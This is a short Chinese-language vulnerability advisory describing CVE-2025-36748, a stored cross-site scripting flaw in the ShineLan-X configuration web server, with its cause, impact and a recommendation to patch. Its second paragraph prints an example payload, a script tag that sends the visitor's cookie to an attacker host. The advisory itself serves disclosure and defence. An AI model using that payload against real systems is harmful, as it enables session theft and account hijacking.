CVE-2025-36748CVE-2025-36748是ShineLan-X本地配置Web服务器中存在的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞位于通信模块的设置中心,攻击者可以通过在配置参数中注入恶意JavaScript代码片段。当其他用户访问受影响的页面或配置时,注入的恶意脚本会在用户浏览器中执行,从而窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或执行其他恶意操作。由于攻击代码被持久化存储在服务器端,所有访问该配置页面的用户都可能受到攻击,具有广泛的传播性和较高的危害性。建议受影响的用户尽快升级到安全版本或应用官方发布的安全补丁。
ShineLan-X的Web服务器在处理通信模块配置时,未对用户输入进行充分的输入验证和输出编码。攻击者利用低权限账户登录系统后,在通信模块设置中心的功能字段(如服务器地址、端口配置、协议参数等)中注入恶意JavaScript代码,如:<script>document.location='https://attacker.com/steal?c='+document.cookie</script>。由于系统未对输入进行安全过滤,该恶意代码被直接存储到数据库中。当管理员或其他用户访问相关配置页面或触发特定功能时,服务器将未经过滤的内容直接返回给客户端浏览器,导致恶意脚本执行。攻击者可借此窃取用户认证令牌、劫持会话、执行任意操作或传播恶意内容。此漏洞属于存储型XSS,攻击代码持久化在服务器端,影响范围更广。